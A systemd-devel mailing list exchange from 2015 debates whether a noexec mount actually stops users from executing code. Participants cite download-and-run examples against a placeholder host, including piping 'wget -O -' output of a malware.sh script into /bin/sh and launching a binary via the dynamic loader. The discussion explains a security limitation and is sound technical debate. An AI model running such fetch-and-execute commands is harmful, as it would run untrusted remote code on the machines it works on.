Am 16.02.2015 um 21:02 schrieb Mantas Mikulėnas:
On Mon, Feb 16, 2015 at 9:40 PM, Reindl Harald wrote:
Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas:
On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
wrote:
wget http://example.com/malware.____x86.bin
<http://example.com/malware.__x86.bin>
<http://example.com/malware.__x86.bin
<http://example.com/malware.x86.bin>>
/lib/ld-linux.so.2 malware.x86.bin
Pretty sure this no longer works; these days noexec prevents
mmap(PROT_EXEC) as well
you should not assume when you can try it simple
[...]
[root@arrakis:~]$ bash /Volumes/dune/test.sh
config-3.18.7-100.fc20.x86_64 grub2
initramfs-3.18.7-100.fc20.x86___64.img initrd-plymouth.img
lost+found System.map-3.18.7-100.fc20.__x86_64
vmlinuz-3.18.7-100.fc20.x86_64
And you should not reply before you read the actual post, in which I
specifically reply to a comment about ld-linux.so – not script
interpreters, which don't rely on this function
the context was about "can you prevent a user from execute something with noexec" and fact is you can't - period
likely you missed the "wget -O - http://example.com/malware.sh | /bin/sh" in the post explaining it.... it's the part you stripped from your quote (maybe not post HTML would have kept it readbale)
signature.asc
Description: OpenPGP digital signature
_______________________________________________ systemd-devel mailing list [email protected] http://lists.freedesktop.org/mailman/listinfo/systemd-devel
